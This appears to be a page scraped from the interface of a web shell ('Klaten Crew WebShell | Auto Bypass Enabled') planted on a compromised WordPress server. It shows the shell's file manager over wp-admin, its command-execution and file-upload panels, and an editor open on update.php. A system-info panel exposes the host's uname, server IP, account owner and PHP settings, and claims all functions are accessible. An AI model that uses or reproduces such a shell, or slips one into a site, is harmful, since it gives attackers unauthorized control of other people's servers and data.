HanJsXploit Klaten Crew
Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64
Apache
Server: 167.114.27.228
Your IP: 216.73.217.47
System Info
HOME
home
ipifapor
progob.ipifap.org
wp-admin
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-07-26 14:34:39
-
css
Folder
-
0755
2026-05-22 09:49:16
images
Folder
-
0755
2026-05-22 09:49:16
includes
Folder
-
0755
2026-02-25 22:58:20
js
Folder
-
0755
2024-10-07 16:51:07
maint
Folder
-
0755
2023-01-22 08:02:00
network
Folder
-
0755
2024-10-07 16:51:07
user
Folder
-
0755
2024-10-07 16:51:07
about.php
File
17.38 KB
0644
2026-07-17 19:13:41
admin-ajax.php
File
5.03 KB
0644
2024-07-04 16:22:14
admin-footer.php
File
2.75 KB
0644
2026-01-05 21:04:58
admin-functions.php
File
479 B
0644
2025-01-22 19:06:22
admin-header.php
File
9.07 KB
0644
2026-02-15 13:02:42
admin-post.php
File
1.97 KB
0644
2025-01-16 21:18:24
admin.php
File
12.63 KB
0644
2026-03-13 04:24:40
async-upload.php
File
5.47 KB
0644
2025-08-27 15:34:28
authorize-application.php
File
10.09 KB
0644
2023-09-14 05:54:20
comment.php
File
11.37 KB
0644
2026-03-07 04:20:46
contribute.php
File
5.9 KB
0644
2026-07-09 20:41:04
credits.php
File
4.42 KB
0644
2026-07-09 20:41:03
custom-background.php
File
489 B
0644
2025-01-22 19:06:22
custom-header.php
File
499 B
0644
2025-01-22 19:06:22
customize.php
File
11.21 KB
0644
2026-05-13 12:20:44
edit-comments.php
File
14.14 KB
0644
2026-02-13 22:52:44
edit-form-advanced.php
File
28.79 KB
0644
2026-01-05 21:04:58
edit-form-blocks.php
File
14.73 KB
0644
2026-02-20 16:52:24
edit-form-comment.php
File
8.33 KB
0644
2026-02-16 22:02:48
edit-link-form.php
File
6.21 KB
0644
2025-02-08 16:44:24
edit-tag-form.php
File
10.42 KB
0644
2026-01-05 21:04:58
edit-tags.php
File
21.98 KB
0644
2026-01-05 21:04:58
edit.php
File
19.48 KB
0644
2024-10-04 03:46:16
erase-personal-data.php
File
7.33 KB
0644
2024-04-18 01:21:16
error_log
File
1.68 KB
0644
2026-06-05 14:56:03
export-personal-data.php
File
7.75 KB
0644
2024-04-18 01:21:16
export.php
File
11 KB
0644
2026-01-05 21:04:58
font-library.php
File
1.01 KB
0644
2026-01-19 22:00:30
freedoms.php
File
4.84 KB
0644
2026-07-09 20:41:04
import.php
File
7.58 KB
0644
2025-02-25 23:34:16
index.php
File
7.68 KB
0644
2023-09-14 05:54:20
install-helper.php
File
6.8 KB
0644
2022-11-20 19:10:16
install.php
File
17.91 KB
0644
2026-02-19 02:14:48
link-add.php
File
934 B
0644
2025-02-08 16:44:24
link-manager.php
File
4.26 KB
0644
2025-02-08 16:44:24
link-parse-opml.php
File
2.63 KB
0644
2026-01-09 07:40:54
link.php
File
2.89 KB
0644
2024-05-01 23:01:12
load-scripts.php
File
2.02 KB
0644
2024-08-26 04:48:14
load-styles.php
File
2.92 KB
0644
2024-11-04 20:51:18
media-new.php
File
3.17 KB
0644
2026-02-01 15:18:40
media-upload.php
File
3.58 KB
0644
2025-02-08 20:53:18
media.php
File
819 B
0644
2024-05-01 23:01:12
menu-header.php
File
9.82 KB
0644
2025-02-21 02:29:22
menu.php
File
17.72 KB
0644
2026-04-27 05:04:40
moderation.php
File
307 B
0644
2020-02-06 11:33:12
ms-admin.php
File
196 B
0644
2020-02-06 11:33:12
ms-delete-site.php
File
4.5 KB
0644
2025-04-21 16:49:32
ms-edit.php
File
216 B
0644
2020-02-06 11:33:12
ms-options.php
File
229 B
0644
2024-06-22 16:47:16
ms-sites.php
File
215 B
0644
2020-02-06 11:33:12
ms-themes.php
File
217 B
0644
2020-02-06 11:33:12
ms-upgrade-network.php
File
219 B
0644
2020-02-06 11:33:12
ms-users.php
File
215 B
0644
2020-02-06 11:33:12
my-sites.php
File
4.72 KB
0644
2026-01-06 10:57:56
nav-menus.php
File
49.07 KB
0644
2026-02-17 11:47:40
network.php
File
5.39 KB
0644
2024-03-09 03:38:08
options-connectors.php
File
1.07 KB
0644
2026-03-05 17:09:16
options-discussion.php
File
15.92 KB
0644
2025-11-11 03:51:36
options-general.php
File
22.32 KB
0644
2026-02-28 04:43:42
options-head.php
File
621 B
0644
2025-01-22 19:06:22
options-media.php
File
6.38 KB
0644
2025-09-29 03:38:32
options-permalink.php
File
21.89 KB
0644
2026-03-05 00:48:42
options-privacy.php
File
9.92 KB
0644
2026-01-09 09:22:50
options-reading.php
File
9.97 KB
0644
2026-03-23 04:06:56
options-writing.php
File
9.1 KB
0644
2026-05-08 20:59:44
options.php
File
13.93 KB
0644
2026-05-08 20:59:44
plugin-editor.php
File
13.75 KB
0644
2025-10-14 02:50:28
plugin-install.php
File
6.96 KB
0644
2024-02-20 12:27:06
plugins.php
File
30 KB
0644
2025-10-14 04:12:28
post-new.php
File
2.7 KB
0644
2024-06-15 17:34:14
post.php
File
10.03 KB
0644
2025-09-06 11:49:32
press-this.php
File
2.41 KB
0644
2026-02-20 07:25:46
privacy-policy-guide.php
File
3.67 KB
0644
2023-11-22 22:44:24
privacy.php
File
2.83 KB
0644
2026-07-09 20:41:04
profile.php
File
283 B
0644
2020-02-06 11:33:12
revision.php
File
5.7 KB
0644
2025-10-07 19:30:30
setup-config.php
File
17.52 KB
0644
2026-02-19 02:14:48
site-editor.php
File
12.07 KB
0644
2026-02-20 16:52:24
site-health-info.php
File
4.05 KB
0644
2026-02-12 02:10:40
site-health.php
File
10.18 KB
0644
2026-01-06 10:57:56
term.php
File
2.2 KB
0644
2022-06-01 23:14:10
theme-editor.php
File
16.87 KB
0644
2025-10-16 05:16:32
theme-install.php
File
23.65 KB
0644
2026-07-09 20:41:04
themes.php
File
48.25 KB
0644
2026-07-09 20:41:04
tools.php
File
3.43 KB
0644
2023-02-23 15:38:22
update-core.php
File
45.12 KB
0644
2026-01-23 23:14:36
update.php
File
12.76 KB
0644
2026-01-09 07:48:52
upgrade-functions.php
File
341 B
0644
2020-02-06 11:33:12
upgrade.php
File
6.24 KB
0644
2026-02-19 02:14:48
upload.php
File
14.9 KB
0644
2026-01-09 07:26:54
user-edit.php
File
40.35 KB
0644
2026-04-27 11:12:44
user-new.php
File
24.06 KB
0644
2026-02-16 22:02:48
users.php
File
23.44 KB
0644
2026-03-14 13:15:46
widgets-form-blocks.php
File
5.12 KB
0644
2025-08-27 15:34:28
widgets-form.php
File
19.14 KB
0644
2026-02-19 03:03:44
widgets.php
File
1.09 KB
0644
2022-03-23 00:59:04
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Klaten Crew WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: update.php
<?php /** * Update/Install Plugin/Theme administration panel. * * @package WordPress * @subpackage Administration */ if ( ! defined( 'IFRAME_REQUEST' ) && isset( $_GET['action'] ) && in_array( $_GET['action'], array( 'update-selected', 'activate-plugin', 'update-selected-themes' ), true ) ) { define( 'IFRAME_REQUEST', true ); } /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php'; wp_enqueue_script( 'wp-a11y' ); if ( isset( $_GET['action'] ) ) { $plugin = isset( $_REQUEST['plugin'] ) ? trim( $_REQUEST['plugin'] ) : ''; $theme = isset( $_REQUEST['theme'] ) ? urldecode( $_REQUEST['theme'] ) : ''; $action = $_REQUEST['action'] ?? ''; if ( 'update-selected' === $action ) { if ( ! current_user_can( 'update_plugins' ) ) { wp_die( __( 'Sorry, you are not allowed to update plugins for this site.' ) ); } check_admin_referer( 'bulk-update-plugins' ); if ( isset( $_GET['plugins'] ) ) { $plugins = explode( ',', stripslashes( $_GET['plugins'] ) ); } elseif ( isset( $_POST['checked'] ) ) { $plugins = (array) $_POST['checked']; } else { $plugins = array(); } $plugins = array_map( 'urldecode', $plugins ); $url = 'update.php?action=update-selected&plugins=' . urlencode( implode( ',', $plugins ) ); $nonce = 'bulk-update-plugins'; wp_enqueue_script( 'updates' ); iframe_header(); $upgrader = new Plugin_Upgrader( new Bulk_Plugin_Upgrader_Skin( compact( 'nonce', 'url' ) ) ); $upgrader->bulk_upgrade( $plugins ); iframe_footer(); } elseif ( 'upgrade-plugin' === $action ) { if ( ! current_user_can( 'update_plugins' ) ) { wp_die( __( 'Sorry, you are not allowed to update plugins for this site.' ) ); } check_admin_referer( 'upgrade-plugin_' . $plugin ); // Used in the HTML title tag. $title = __( 'Update Plugin' ); $parent_file = 'plugins.php'; $submenu_file = 'plugins.php'; wp_enqueue_script( 'updates' ); require_once ABSPATH . 'wp-admin/admin-header.php'; $nonce = 'upgrade-plugin_' . $plugin; $url = 'update.php?action=upgrade-plugin&plugin=' . urlencode( $plugin ); $upgrader = new Plugin_Upgrader( new Plugin_Upgrader_Skin( compact( 'title', 'nonce', 'url', 'plugin' ) ) ); $upgrader->upgrade( $plugin ); require_once ABSPATH . 'wp-admin/admin-footer.php'; } elseif ( 'activate-plugin' === $action ) { if ( ! current_user_can( 'update_plugins' ) ) { wp_die( __( 'Sorry, you are not allowed to update plugins for this site.' ) ); } check_admin_referer( 'activate-plugin_' . $plugin ); if ( ! isset( $_GET['failure'] ) && ! isset( $_GET['success'] ) ) { wp_redirect( admin_url( 'update.php?action=activate-plugin&failure=true&plugin=' . urlencode( $plugin ) . '&_wpnonce=' . $_GET['_wpnonce'] ) ); activate_plugin( $plugin, '', ! empty( $_GET['networkwide'] ), true ); wp_redirect( admin_url( 'update.php?action=activate-plugin&success=true&plugin=' . urlencode( $plugin ) . '&_wpnonce=' . $_GET['_wpnonce'] ) ); die(); } iframe_header( __( 'Plugin Reactivation' ), true ); if ( isset( $_GET['success'] ) ) { echo '<p>' . __( 'Plugin reactivated successfully.' ) . '</p>'; } if ( isset( $_GET['failure'] ) ) { echo '<p>' . __( 'Plugin failed to reactivate due to a fatal error.' ) . '</p>'; error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR ); ini_set( 'display_errors', true ); // Ensure that fatal errors are displayed. wp_register_plugin_realpath( WP_PLUGIN_DIR . '/' . $plugin ); include WP_PLUGIN_DIR . '/' . $plugin; } iframe_footer(); } elseif ( 'install-plugin' === $action ) { if ( ! current_user_can( 'install_plugins' ) ) { wp_die( __( 'Sorry, you are not allowed to install plugins on this site.' ) ); } require_once ABSPATH . 'wp-admin/includes/plugin-install.php'; // For plugins_api(). check_admin_referer( 'install-plugin_' . $plugin ); $api = plugins_api( 'plugin_information', array( 'slug' => $plugin, 'fields' => array( 'sections' => false, ), ) ); if ( is_wp_error( $api ) ) { wp_die( $api ); } // Used in the HTML title tag. $title = __( 'Plugin Installation' ); $parent_file = 'plugins.php'; $submenu_file = 'plugin-install.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; /* translators: %s: Plugin name and version. */ $title = sprintf( __( 'Installing Plugin: %s' ), $api->name . ' ' . $api->version ); $nonce = 'install-plugin_' . $plugin; $url = 'update.php?action=install-plugin&plugin=' . urlencode( $plugin ); if ( isset( $_GET['from'] ) ) { $url .= '&from=' . urlencode( stripslashes( $_GET['from'] ) ); } $type = 'web'; // Install plugin type, From Web or an Upload. $upgrader = new Plugin_Upgrader( new Plugin_Installer_Skin( compact( 'title', 'url', 'nonce', 'plugin', 'api' ) ) ); $upgrader->install( $api->download_link ); require_once ABSPATH . 'wp-admin/admin-footer.php'; } elseif ( 'upload-plugin' === $action ) { if ( ! current_user_can( 'upload_plugins' ) ) { wp_die( __( 'Sorry, you are not allowed to install plugins on this site.' ) ); } check_admin_referer( 'plugin-upload' ); if ( isset( $_FILES['pluginzip']['name'] ) && ! str_ends_with( strtolower( $_FILES['pluginzip']['name'] ), '.zip' ) ) { wp_die( __( 'Only .zip archives may be uploaded.' ) ); } $file_upload = new File_Upload_Upgrader( 'pluginzip', 'package' ); // Used in the HTML title tag. $title = __( 'Upload Plugin' ); $parent_file = 'plugins.php'; $submenu_file = 'plugin-install.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; /* translators: %s: File name. */ $title = sprintf( __( 'Installing plugin from uploaded file: %s' ), esc_html( basename( $file_upload->filename ) ) ); $nonce = 'plugin-upload'; $url = add_query_arg( array( 'package' => $file_upload->id ), 'update.php?action=upload-plugin' ); $type = 'upload'; // Install plugin type, From Web or an Upload. $overwrite = isset( $_GET['overwrite'] ) ? sanitize_text_field( $_GET['overwrite'] ) : ''; $overwrite = in_array( $overwrite, array( 'update-plugin', 'downgrade-plugin' ), true ) ? $overwrite : ''; $upgrader = new Plugin_Upgrader( new Plugin_Installer_Skin( compact( 'type', 'title', 'nonce', 'url', 'overwrite' ) ) ); $result = $upgrader->install( $file_upload->package, array( 'overwrite_package' => $overwrite ) ); if ( $result || is_wp_error( $result ) ) { $file_upload->cleanup(); } require_once ABSPATH . 'wp-admin/admin-footer.php'; } elseif ( 'upload-plugin-cancel-overwrite' === $action ) { if ( ! current_user_can( 'upload_plugins' ) ) { wp_die( __( 'Sorry, you are not allowed to install plugins on this site.' ) ); } check_admin_referer( 'plugin-upload-cancel-overwrite' ); // Make sure the attachment still exists, or File_Upload_Upgrader will call wp_die() // that shows a generic "Please select a file" error. if ( ! empty( $_GET['package'] ) ) { $attachment_id = (int) $_GET['package']; if ( get_post( $attachment_id ) ) { $file_upload = new File_Upload_Upgrader( 'pluginzip', 'package' ); $file_upload->cleanup(); } } wp_redirect( self_admin_url( 'plugin-install.php' ) ); exit; } elseif ( 'upgrade-theme' === $action ) { if ( ! current_user_can( 'update_themes' ) ) { wp_die( __( 'Sorry, you are not allowed to update themes for this site.' ) ); } check_admin_referer( 'upgrade-theme_' . $theme ); wp_enqueue_script( 'updates' ); // Used in the HTML title tag. $title = __( 'Update Theme' ); $parent_file = 'themes.php'; $submenu_file = 'themes.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; $nonce = 'upgrade-theme_' . $theme; $url = 'update.php?action=upgrade-theme&theme=' . urlencode( $theme ); $upgrader = new Theme_Upgrader( new Theme_Upgrader_Skin( compact( 'title', 'nonce', 'url', 'theme' ) ) ); $upgrader->upgrade( $theme ); require_once ABSPATH . 'wp-admin/admin-footer.php'; } elseif ( 'update-selected-themes' === $action ) { if ( ! current_user_can( 'update_themes' ) ) { wp_die( __( 'Sorry, you are not allowed to update themes for this site.' ) ); } check_admin_referer( 'bulk-update-themes' ); if ( isset( $_GET['themes'] ) ) { $themes = explode( ',', stripslashes( $_GET['themes'] ) ); } elseif ( isset( $_POST['checked'] ) ) { $themes = (array) $_POST['checked']; } else { $themes = array(); } $themes = array_map( 'urldecode', $themes ); $url = 'update.php?action=update-selected-themes&themes=' . urlencode( implode( ',', $themes ) ); $nonce = 'bulk-update-themes'; wp_enqueue_script( 'updates' ); iframe_header(); $upgrader = new Theme_Upgrader( new Bulk_Theme_Upgrader_Skin( compact( 'nonce', 'url' ) ) ); $upgrader->bulk_upgrade( $themes ); iframe_footer(); } elseif ( 'install-theme' === $action ) { if ( ! current_user_can( 'install_themes' ) ) { wp_die( __( 'Sorry, you are not allowed to install themes on this site.' ) ); } require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php'; // For themes_api(). check_admin_referer( 'install-theme_' . $theme ); $api = themes_api( 'theme_information', array( 'slug' => $theme, 'fields' => array( 'sections' => false, 'tags' => false, ), ) ); // Save on a bit of bandwidth. if ( is_wp_error( $api ) ) { wp_die( $api ); } // Used in the HTML title tag. $title = __( 'Install Themes' ); $parent_file = 'themes.php'; $submenu_file = 'themes.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; /* translators: %s: Theme name and version. */ $title = sprintf( __( 'Installing Theme: %s' ), $api->name . ' ' . $api->version ); $nonce = 'install-theme_' . $theme; $url = 'update.php?action=install-theme&theme=' . urlencode( $theme ); $type = 'web'; // Install theme type, From Web or an Upload. $upgrader = new Theme_Upgrader( new Theme_Installer_Skin( compact( 'title', 'url', 'nonce', 'plugin', 'api' ) ) ); $upgrader->install( $api->download_link ); require_once ABSPATH . 'wp-admin/admin-footer.php'; } elseif ( 'upload-theme' === $action ) { if ( ! current_user_can( 'upload_themes' ) ) { wp_die( __( 'Sorry, you are not allowed to install themes on this site.' ) ); } check_admin_referer( 'theme-upload' ); if ( isset( $_FILES['themezip']['name'] ) && ! str_ends_with( strtolower( $_FILES['themezip']['name'] ), '.zip' ) ) { wp_die( __( 'Only .zip archives may be uploaded.' ) ); } $file_upload = new File_Upload_Upgrader( 'themezip', 'package' ); // Used in the HTML title tag. $title = __( 'Upload Theme' ); $parent_file = 'themes.php'; $submenu_file = 'theme-install.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; /* translators: %s: File name. */ $title = sprintf( __( 'Installing theme from uploaded file: %s' ), esc_html( basename( $file_upload->filename ) ) ); $nonce = 'theme-upload'; $url = add_query_arg( array( 'package' => $file_upload->id ), 'update.php?action=upload-theme' ); $type = 'upload'; // Install theme type, From Web or an Upload. $overwrite = isset( $_GET['overwrite'] ) ? sanitize_text_field( $_GET['overwrite'] ) : ''; $overwrite = in_array( $overwrite, array( 'update-theme', 'downgrade-theme' ), true ) ? $overwrite : ''; $upgrader = new Theme_Upgrader( new Theme_Installer_Skin( compact( 'type', 'title', 'nonce', 'url', 'overwrite' ) ) ); $result = $upgrader->install( $file_upload->package, array( 'overwrite_package' => $overwrite ) ); if ( $result || is_wp_error( $result ) ) { $file_upload->cleanup(); } require_once ABSPATH . 'wp-admin/admin-footer.php'; } elseif ( 'upload-theme-cancel-overwrite' === $action ) { if ( ! current_user_can( 'upload_themes' ) ) { wp_die( __( 'Sorry, you are not allowed to install themes on this site.' ) ); } check_admin_referer( 'theme-upload-cancel-overwrite' ); // Make sure the attachment still exists, or File_Upload_Upgrader will call wp_die() // that shows a generic "Please select a file" error. if ( ! empty( $_GET['package'] ) ) { $attachment_id = (int) $_GET['package']; if ( get_post( $attachment_id ) ) { $file_upload = new File_Upload_Upgrader( 'themezip', 'package' ); $file_upload->cleanup(); } } wp_redirect( self_admin_url( 'theme-install.php' ) ); exit; } else { /** * Fires when a custom plugin or theme update request is received. * * The dynamic portion of the hook name, `$action`, refers to the action * provided in the request for wp-admin/update.php. Can be used to * provide custom update functionality for themes and plugins. * * @since 2.8.0 */ do_action( "update-custom_{$action}" ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores } }
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64 Software: Apache PHP Version: 8.3.31 Protocol: HTTP/1.1 Server IP: 167.114.27.228 Your IP: 216.73.217.47 Mail: ON Curl: ON Owner: ipifapor MySQL: ON Disabled Functions: All functions are accessible Auto Bypass: ENABLED